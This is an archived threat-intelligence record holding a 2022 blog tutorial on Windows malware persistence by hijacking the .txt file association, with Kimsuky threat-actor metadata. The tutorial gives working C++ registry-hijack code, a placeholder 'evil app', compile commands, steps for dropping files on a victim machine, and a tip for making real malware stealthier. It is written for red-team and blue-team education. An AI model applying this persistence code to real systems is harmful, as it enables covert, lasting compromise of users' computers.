{ "id": "cc794391-4dca-409f-be29-344c88908dd7", "created_at": "2026-04-06T02:12:11.338986Z", "updated_at": "2026-04-10T03:37:41.026762Z", "deleted_at": null, "sha1_hash": "d024ba07693e90631f56e0ccf049775a082516ca", "title": "Malware development: persistence - part 9. Default file extension hijacking. Simple C++ example.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1100175, "plain_text": "Malware development: persistence - part 9. Default file extension\r\nhijacking. Simple C++ example.\r\nBy cocomelonc\r\nPublished: 2022-08-26 · Archived: 2026-04-06 01:29:22 UTC\r\n2 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis article is the result of my own research into one of the interesting malware persistence trick: hijacking default\r\nfile extension.\r\ndefault file associationPermalink\r\nFor example, when a .txt file is double-clicked, notepad.exe is used to open it.\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\nPage 1 of 9\n\nWindows knows that it must use notepad.exe to access .txt files because the .txt extension (and many\r\nothers) are mapped to applications that can open such files in the registry: HKEY_CLASSES_ROOT .\r\nIt is possible to hijacking a default file association to execute a malicious program.\r\npractical examplePermalink\r\nLet’s go to hijack .txt . In this case, the .txt extension handler is specified in the registry key listed below:\r\nHKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\r\nRun command:\r\nreg query \"HKCR\\txtfile\\shell\\open\\command\" /s\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\nPage 2 of 9\n\nThen, create our “malicious” application:\r\n/*\r\nhack.cpp\r\nevil app for windows persistence via\r\nhijacking default file extension\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBox(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n return 0;\r\n}\r\nAs you can see, the logic is pretty simple as usually: just pop-up meow-meow messagebox.\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\nPage 3 of 9\n\nAt the next step, hijack the .txt file extension by modifying the value data of\r\n\\HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command by this script:\r\n/*\r\npers.cpp\r\nwindows persistence via\r\nhijacking default file extension\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\n#include \u003cstdlib.h\u003e\r\n#include \u003cstdio.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // command for replace\r\n // \"%SystemRoot%\\\\system32\\\\NOTEPAD.EXE %1\"\r\n // malicious app\r\n const char* cmd = \"Z:\\\\2022-08-26-malware-pers-9\\\\hack.exe\";\r\n // hijacking logic\r\n LONG res = RegOpenKeyEx(HKEY_CLASSES_ROOT, (LPCSTR)\"\\\\txtfile\\\\shell\\\\open\\\\command\", 0 , KEY_WRITE, \u0026hkey);\r\n if (res == ERROR_SUCCESS) {\r\n // update key\r\n RegSetValueEx(hkey, (LPCSTR)\"\", 0, REG_SZ, (unsigned char*)cmd, strlen(cmd));\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nAs you can see, in this source code we just replace %SystemRoot%\\system32\\NOTEPAD.EXE %1 with Z:\\2022-08-\r\n26-malware-pers-9\\hack.exe .\r\ndemoPermalink\r\nLet’s go to see everything in action. Compile our malware:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\nPage 4 of 9\n\nThe generated hack.exe needs to be dropped into the victim’s machine.\r\nThen, compile the program responsible for persistence:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nThe generated pers.exe also needs to be dropped into the victim’s machine.\r\nThen just run:\r\n.\\pers.exe\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\nPage 5 of 9\n\nSo, try to open .txt file, for example double-click test.txt :\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\nPage 6 of 9\n\nAs you can see, the “malware” will be executed. Perfect! :)\r\nThen, cleanup:\r\nreg add \"HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\" /ve /t REG_SZ /d \"%SystemRoot%\\system32\\NOTEPAD.EXE %1\"\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\nPage 7 of 9\n\nIt would be good practice to do this (in real malware) with little bit different logic so that the victim user will still\r\nbe able to open the original .txt file, but he will additionally run the malicious activity.\r\nThis persistence trick is used by SILENTTRINITY framework and Kimsuky cyber espionage group. This\r\nmalware was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.\r\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red\r\nteamers arsenal.\r\nMITRE ATT\u0026CK: Change Default File Association\r\nSILENTTRINITY\r\nKimsuky\r\nsource code on Github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\nPage 8 of 9\n\nSource: https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html" ], "report_names": [ "malware-pers-9.html" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775441531, "ts_updated_at": 1775792261, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d024ba07693e90631f56e0ccf049775a082516ca.pdf", "text": "https://archive.orkl.eu/d024ba07693e90631f56e0ccf049775a082516ca.txt", "img": "https://archive.orkl.eu/d024ba07693e90631f56e0ccf049775a082516ca.jpg" } }